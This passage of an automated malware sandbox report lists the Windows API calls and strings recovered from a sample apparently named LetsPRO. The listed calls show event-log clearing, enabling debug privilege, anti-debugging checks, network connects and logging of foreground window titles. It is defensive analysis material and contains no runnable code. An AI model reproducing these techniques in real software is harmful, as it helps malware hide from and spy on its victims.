                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Event$ClearCloseOpen
                                        • String ID: Application$Security$System
                                        • API String ID: 1391105993-2169399579
                                        • Opcode ID: 5d4a53c5ca775dbf46e677710a3782dd39ab703bc7bd226ac33fa61fac998905
                                        • Instruction ID: efd49934535be50d6d60a8b2fcd38980d0741ac59065483fc7d015338d6701b9
                                        • Opcode Fuzzy Hash: 5d4a53c5ca775dbf46e677710a3782dd39ab703bc7bd226ac33fa61fac998905
                                        • Instruction Fuzzy Hash: 8DE0E53360632857C211DB05AC4471EF7D0FBCA316F040619FA4D56214C63088058B96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,03F378FC), ref: 03F37756
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,03F378FC,?,?,?,?,?,?,75920630), ref: 03F3775D
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 03F37785
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 03F377B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2349140579-2896544425
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 03F4131C
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03F41331
                                        • UnhandledExceptionFilter.KERNEL32(03F525B8), ref: 03F4133C
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 03F41358
                                        • TerminateProcess.KERNEL32(00000000), ref: 03F4135F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                        • String ID:
                                        • API String ID: 2579439406-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualAlloc.KERNEL32(000040B9,ABACE041,00003000,00000004,?,?,?), ref: 00401654
                                        • LoadLibraryA.KERNEL32(?), ref: 004019C1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3261284446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.3261192379.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000004.00000002.3261375715.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AllocLibraryLoadVirtual
                                        • String ID: Virt$lloc$ree$ualA$ualF
                                        • API String ID: 3550616410-2349079771
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F4401C
                                        • __mtterm.LIBCMT ref: 03F44028
                                          • Part of subcall function 03F43CF1: DecodePointer.KERNEL32(0000000A,03F41084,03F4106A,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F43D02
                                          • Part of subcall function 03F43CF1: TlsFree.KERNEL32(00000018,03F41084,03F4106A,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F43D1C
                                          • Part of subcall function 03F43CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,03F41084,03F4106A,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F48D48
                                          • Part of subcall function 03F43CF1: _free.LIBCMT ref: 03F48D4B
                                          • Part of subcall function 03F43CF1: DeleteCriticalSection.KERNEL32(00000018,?,?,03F41084,03F4106A,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F48D72
                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 03F4403E
                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 03F4404B
                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 03F44058
                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 03F44065
                                        • TlsAlloc.KERNEL32(?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F440B5
                                        • TlsSetValue.KERNEL32(00000000,?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F440D0
                                        • __init_pointers.LIBCMT ref: 03F440DA
                                        • EncodePointer.KERNEL32(?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F440EB
                                        • EncodePointer.KERNEL32(?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F440F8
                                        • EncodePointer.KERNEL32(?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F44105
                                        • EncodePointer.KERNEL32(?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F44112
                                        • DecodePointer.KERNEL32(Function_00013E75,?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F44133
                                        • __calloc_crt.LIBCMT ref: 03F44148
                                        • DecodePointer.KERNEL32(00000000,?,?,03F40FC1,03F56278,00000008,03F41155,?,?,?,03F56298,0000000C,03F41210,?), ref: 03F44162
                                        • GetCurrentThreadId.KERNEL32 ref: 03F44174
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                        • API String ID: 3698121176-3819984048
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
                                        • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                        • API String ID: 3970221696-33419044
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memset$swprintf$_malloc
                                        • String ID: %s %s$onlyloadinmyself$plugmark
                                        • API String ID: 1873853019-591889663
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,03F3A8C1,?,?), ref: 03F3DA43
                                        • SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,03F3A8C1,?,?), ref: 03F3DA62
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast
                                        • String ID:
                                        • API String ID: 1452528299-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • socket.WS2_32(00000002,00000002,00000011), ref: 025F36F0
                                        • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 025F3729
                                        • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 025F3746
                                        • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 025F3759
                                        • WSACreateEvent.WS2_32 ref: 025F375B
                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,0260D990), ref: 025F376D
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,0260D990), ref: 025F3779
                                        • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,0260D990), ref: 025F3798
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0260D990), ref: 025F37A4
                                        • gethostbyname.WS2_32(00000000), ref: 025F37B2
                                        • htons.WS2_32(?), ref: 025F37D8
                                        • WSAEventSelect.WS2_32(?,?,00000030), ref: 025F37F6
                                        • connect.WS2_32(?,?,00000010), ref: 025F380B
                                        • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,0260D990), ref: 025F381A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                        • String ID:
                                        • API String ID: 1455939504-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • socket.WS2_32(00000002,00000002,00000011), ref: 03F33710
                                        • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 03F33749
                                        • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 03F33766
                                        • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 03F33779
                                        • WSACreateEvent.WS2_32 ref: 03F3377B
                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,03F61F0C), ref: 03F3378D
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,03F61F0C), ref: 03F33799
                                        • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,03F61F0C), ref: 03F337B8
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,03F61F0C), ref: 03F337C4
                                        • gethostbyname.WS2_32(00000000), ref: 03F337D2
                                        • htons.WS2_32(?), ref: 03F337F8
                                        • WSAEventSelect.WS2_32(?,?,00000030), ref: 03F33816
                                        • connect.WS2_32(?,?,00000010), ref: 03F3382B
                                        • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,03F61F0C), ref: 03F3383A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                        • String ID:
                                        • API String ID: 1455939504-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLocalTime.KERNEL32(?,1A93E2E0), ref: 03F3AA58
                                        • wsprintfW.USER32 ref: 03F3AA8F
                                        • _memset.LIBCMT ref: 03F3AAA7
                                        • _memset.LIBCMT ref: 03F3AABA
                                          • Part of subcall function 03F38020: lstrlenW.KERNEL32(?), ref: 03F38038
                                          • Part of subcall function 03F38020: _memset.LIBCMT ref: 03F38042
                                          • Part of subcall function 03F38020: lstrlenW.KERNEL32(?), ref: 03F3804B
                                          • Part of subcall function 03F38020: lstrlenW.KERNEL32(?), ref: 03F38056
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 03F3ABBE
                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 03F3AC6E
                                        • CloseHandle.KERNEL32(?), ref: 03F3ACAA
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                          • Part of subcall function 03F39730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,1A93E2E0,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E,00000000), ref: 03F39773
                                          • Part of subcall function 03F39730: InitializeCriticalSectionAndSpinCount.KERNEL32(03F3E1AE,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F39812
                                          • Part of subcall function 03F39730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,03F5125B,000000FF,?,03F3E04E), ref: 03F39850
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
                                        • String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
                                        • API String ID: 1254190970-1225219777
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 03F35320: InterlockedDecrement.KERNEL32(00000008), ref: 03F3536F
                                          • Part of subcall function 03F35320: SysFreeString.OLEAUT32(00000000), ref: 03F35384
                                          • Part of subcall function 03F35320: SysAllocString.OLEAUT32(03F55148), ref: 03F353D5
                                        • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03F55148,03F369A4,03F55148,00000000,75A773E0), ref: 03F367F4
                                        • GetLastError.KERNEL32 ref: 03F367FE
                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 03F36816
                                        • HeapAlloc.KERNEL32(00000000), ref: 03F3681D
                                        • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 03F3683F
                                        • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03F36871
                                        • GetLastError.KERNEL32 ref: 03F3687B
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 03F368E6
                                        • HeapFree.KERNEL32(00000000), ref: 03F368ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                        • String ID: NONE_MAPPED
                                        • API String ID: 1317816589-2950899194
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 03F3C889
                                        • RegDeleteValueW.ADVAPI32(?), ref: 03F3C894
                                        • RegCloseKey.ADVAPI32(?), ref: 03F3C8A4
                                        • RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 03F3C8C3
                                        • lstrlenW.KERNEL32(?), ref: 03F3C8D1
                                        • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 03F3C8E4
                                        • RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 03F3C8F2
                                        • RegCloseKey.ADVAPI32(?), ref: 03F3C900
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Close$Value$CreateDeleteOpenlstrlen
                                        • String ID: AppEvents$Network
                                        • API String ID: 3935456190-3733486940
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,EAAB552F,00000000,?,00000000,025F6190,00000000), ref: 025F5A65
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(025F62F0,00000000), ref: 025F5B04
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 025F5B42
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 025F5B67
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(025F6390,00000000), ref: 025F5C5F
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(025F63A8,00000000), ref: 025F5C80
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 025F5B8C
                                          • Part of subcall function 025F1280: __CxxThrowException@8.LIBCMT ref: 025F1290
                                          • Part of subcall function 025F1280: RtlDeleteCriticalSection.NTDLL(00000000), ref: 025F12A1
                                        • InterlockedExchange.KERNEL32(025F61A8,00000000), ref: 025F5CF1
                                        • timeGetTime.WINMM ref: 025F5CF7
                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 025F5D0B
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 025F5D14
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                        • String ID:
                                        • API String ID: 1400036169-0
                                        • Opcode ID: 7f5be0b962ef720a4d27a46de0e214d97385bab001960f377522570953c010fc
                                        • Instruction ID: 951222a5171f4033a28b5b62b1c063de22d0d9708d94ea38d3dc7835e8bfe1cc
                                        • Opcode Fuzzy Hash: 7f5be0b962ef720a4d27a46de0e214d97385bab001960f377522570953c010fc
                                        • Instruction Fuzzy Hash: DEA1F8B0A41A46AFD354DF6AC8C479AFBE8FB08304F90462ED12DC7640D774A964DF94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _memset.LIBCMT ref: 03F3E751
                                        • GetForegroundWindow.USER32(?,759223A0,00000000), ref: 03F3E759
                                        • GetWindowTextW.USER32(00000000,03F616F0,00000800), ref: 03F3E76F
                                        • _memset.LIBCMT ref: 03F3E78D
                                        • lstrlenW.KERNEL32(03F616F0,?,?,?,?,759223A0,00000000), ref: 03F3E7AC
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,759223A0,00000000), ref: 03F3E7BD
                                        • wsprintfW.USER32 ref: 03F3E804
                                          • Part of subcall function 03F3E6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,03F3E815,?,?,?,?,759223A0,00000000), ref: 03F3E6BD
                                          • Part of subcall function 03F3E6B0: CreateFileW.KERNEL32(03F60D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,03F3E815,?,?,?,?,759223A0,00000000), ref: 03F3E6D7
                                          • Part of subcall function 03F3E6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 03F3E6F2
                                          • Part of subcall function 03F3E6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 03F3E6FF
                                          • Part of subcall function 03F3E6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 03F3E70A
                                          • Part of subcall function 03F3E6B0: CloseHandle.KERNEL32(00000000), ref: 03F3E711
                                          • Part of subcall function 03F3E6B0: ReleaseMutex.KERNEL32(00000000), ref: 03F3E71E
                                        • _memset.LIBCMT ref: 03F3E820
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                        • String ID: [
                                        • API String ID: 2192163267-4056885943
                                        • Opcode ID: 99485593f8b0170d321503e499d4ded5e80b3ed75606f1fdf684151566c61017
                                        • Instruction ID: e2994a6e606417a9f763344f1caa50635e88ce5c5cdb04890aa9813bc508e6e4
                                        • Opcode Fuzzy Hash: 99485593f8b0170d321503e499d4ded5e80b3ed75606f1fdf684151566c61017
                                        • Instruction Fuzzy Hash: F921B579A0021CAAC760EF949C15BBB77BDFF04701F0481A5F945A6144EE71A985CBE4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 03F34F63
                                        • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 03F34F78
                                        • WSASetLastError.WS2_32(00002746), ref: 03F34F8A
                                        • LeaveCriticalSection.KERNEL32(000002FF), ref: 03F34F91
                                        • timeGetTime.WINMM ref: 03F34FBF
                                        • timeGetTime.WINMM ref: 03F34FE7
                                        • SetEvent.KERNEL32(?), ref: 03F35025
                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 03F35031
                                        • LeaveCriticalSection.KERNEL32(000002FF), ref: 03F35038
                                        • LeaveCriticalSection.KERNEL32(000002FF), ref: 03F3504B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                        • String ID:
                                        • API String ID: 1979691958-0
                                        • Opcode ID: 0ba2d581b04d32bbcf0febdcf686a869d151b43ba7cf86e1acd3c5d932fcf309
                                        • Instruction ID: 03b4ef51ff4c01b20b25cf933db614ae8fd3458bc631e1c1a8b05aa8b813d3e9
                                        • Opcode Fuzzy Hash: 0ba2d581b04d32bbcf0febdcf686a869d151b43ba7cf86e1acd3c5d932fcf309
                                        • Instruction Fuzzy Hash: 94410B71A003069FD730EF79D588A7AB7E9FF4A314F0C4A99E94AC7651E336E4408B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _memset.LIBCMT ref: 03F3C2AE
                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 03F3C2CC
                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 03F3C309
                                        • CloseHandle.KERNEL32(00000000), ref: 03F3C314
                                        • lstrlenW.KERNEL32(?), ref: 03F3C321
                                        • wsprintfW.USER32 ref: 03F3C345
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
                                        • String ID: %s %s
                                        • API String ID: 1326869720-2939940506
                                        • Opcode ID: 8d84aee0bba9a7f06101509d02bb759b85ad3461e3cc66aec93c8d6df0ca63b5
                                        • Instruction ID: 87d54e7321a9ad5ca3099c4ffa557ee8b7af576906444d07fc33e42c14f32ca2
                                        • Opcode Fuzzy Hash: 8d84aee0bba9a7f06101509d02bb759b85ad3461e3cc66aec93c8d6df0ca63b5
                                        • Instruction Fuzzy Hash: EE318476A403186BDB24EB64DC84FEF7378EB46311F4006A9B606F6180DA71AA44CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • lstrlenW.KERNEL32(?), ref: 03F3C98D
                                        • _wcsrchr.LIBCMT ref: 03F3C9C7
                                          • Part of subcall function 03F37C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 03F37CC3
                                          • Part of subcall function 03F37C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03F37CD7
                                          • Part of subcall function 03F37C80: FreeLibrary.KERNEL32(00000000), ref: 03F37CF7
                                        • GetFileAttributesW.KERNEL32(-00000002), ref: 03F3C9E6
                                        • GetLastError.KERNEL32 ref: 03F3C9F1
                                        • _memset.LIBCMT ref: 03F3CA04
                                        • CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 03F3CA31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
                                        • String ID: D$WinSta0\Default
                                        • API String ID: 174883095-1101385590
                                        • Opcode ID: ce1a94b7e94d909c0c179b288371097fd4163c125026d6e54bf23ac10b8d678e
                                        • Instruction ID: a3cbe5c397a492107234bcb915bc075946ffc0a304321102a2db7635fd0f884a
                                        • Opcode Fuzzy Hash: ce1a94b7e94d909c0c179b288371097fd4163c125026d6e54bf23ac10b8d678e
                                        • Instruction Fuzzy Hash: 2911E7B7D0030837DB20E6B89C55FAFBB6D9B46610F040125FB0AEA284EA759905C6A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • lstrcmpiW.KERNEL32(?,A:\), ref: 03F38166
                                        • lstrcmpiW.KERNEL32(?,B:\), ref: 03F38176
                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 03F381A6
                                        • lstrlenW.KERNEL32(?), ref: 03F381B7
                                        • __wcsnicmp.LIBCMT ref: 03F381CE
                                        • lstrcpyW.KERNEL32(00000AD4,?), ref: 03F38204
                                        • lstrcpyW.KERNEL32(?,?), ref: 03F38228
                                        • lstrcatW.KERNEL32(?,00000000), ref: 03F38233
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
